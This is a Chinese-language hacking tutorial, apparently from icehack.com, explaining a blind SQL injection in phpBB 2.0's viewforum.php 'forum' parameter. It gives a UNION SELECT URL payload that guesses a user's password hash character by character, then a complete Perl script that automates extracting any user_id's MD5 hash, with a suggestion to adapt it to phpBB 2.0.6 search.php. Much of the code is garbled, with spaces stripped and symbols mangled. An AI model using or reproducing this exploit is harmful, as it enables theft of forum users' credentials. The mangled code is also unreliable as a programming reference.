php注入实例

php注入实例 在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期，下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sqlnjection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if(isset($HTTP_GET_VARS<pOST_FORUM_URL])││isset($HTTP_POST_VARS<pOST_FORUM_URL]))
{
$forum_id=(isset($HTTP_GET_VARS<pOST_FORUM_URL]))?intval($HTTP_GET_VARS<pOST_FORUM_URL]):intval

($HTTP_POST_VARS<pOST_FORUM_URL]);
}
elseif(isset($HTTP_GET_VARS["forum"]))
{
$forum_id=$HTTP_GET_VARS["forum"];
}
else
{
$forum_id="";
}
就是这个forum,而下面直接把它放进了查询中:
if(!empty($forum_id))
{
$sql="SELECT*
FROM".FORUMS_TABLE."
WHEREforum_id=$forum_id";
if(!($result=$db->sql_query($sql)))
{
message_die(GENERAL_ERROR,"Couldnotobtainforumsinformation","",__LINE__,__FILE__,$sql);
}
}
else
{
message_die(GENERAL_MESSAGE,"Forum_not_exist");
}

如果是asp的话，相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话，就会使$result为空，于是返回Couldnotobtainforumsinformation的信息,于是下面的代码就不能执行下去了
//
//Ifthequerydoesn"treturnanyrowsthisisn"tavalidforum.Inform
//theuser.
//
if(!($forum_row=$db->sql_fetchrow($result)))
{
message_die(GENERAL_MESSAGE,"Forum_not_exist");
}

//
//Startsessionmanagement
//
$userdata=session_pagestart($user_ip,$forum_id)/****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip,$thispage_id),这是在session.php中定义的一个函数,由于代码太

长，就不全贴出来了,有兴趣的可以自已看看，关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id,$user_ip,

$thispage_id,TRUE))，同样是在这个文件中定义的,其中有如下代码
$sql="UPDATE".SESSIONS_TABLE."
SETsession_user_id=$user_id,session_start=$current_time,session_time=$current_time,session_page=

$page_id,session_logged_in=$login
WHEREsession_id="".$session_id.""
ANDsession_ip="$user_ip"";
if(!($result=$db->sql_query($sql))││!$db->sql_affectedrows())
{
$session_id=md5(uniqid($user_ip));

$sql="INSERTINTO".SESSIONS_TABLE."
(session_id,session_user_id,session_start,session_time,session_ip,session_page,

session_logged_in)
VALUES("$session_id",$user_id,$current_time,$current_time,"$user_ip",$page_id,$login)";
if(!($result=$db->sql_query($sql)))
{
message_die(CRITICAL_ERROR,"Errorcreatingnewsession:session_begin","",__LINE__,__FILE__,

$sql);
}


在这里有个session_page在mysql中定义的是个整形数,他的??$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creatingnewsession:session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数，插入的不是整数当然就要出错了，于是就显示Errorcreatingnewsession:session_begin,就表明你猜对了第一位了，其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功，看来出错信息也很有帮助啊.分析就到这里，下面附上一段测试代码，这段代码只要稍加修改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件，中文和其它语言的只要改一下返回条件就行了.

useHTTP::Request::Common;
useHTTP::Response;
useLWP::UserAgent;
$ua=newLWP::UserAgent;

print"***********************n";
print"phpbbviewforum.phpexpn";
print"codebypinkeyesn";
print"www.icehack.comn";
print"************************n";
print"pleaseentertheweakfile"surl:n";
print"e.g.http://192.168.1.4/phpBB2/viewforum.phpn";
$adr=<STDIN>;
chomp($adr);
print"pleaseentertheuser_idthatyouwanttocrackn";
$u=<STDIN>;
chomp($u);
print"workstarting,pleasewait!n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request=HTTP::Request->new("GET","$url");
$response=$ua->request($request);

if($response->is_success){
if($response->content=~/Errorcreatingnewsession/){
$pwd.=chr($pink[$i]);
print"$pwdn";
}

}
}
}
if($pwdne""){
print"successfully,Thepasswordis$pwd,goodluckn";}
else{
print"badluck,workfailed!n";}

至于最近的phpbb2.0.6的search.php的问题利用程序只要将上面代码稍加修改就行了,如要错误请上www.icehack.com指正.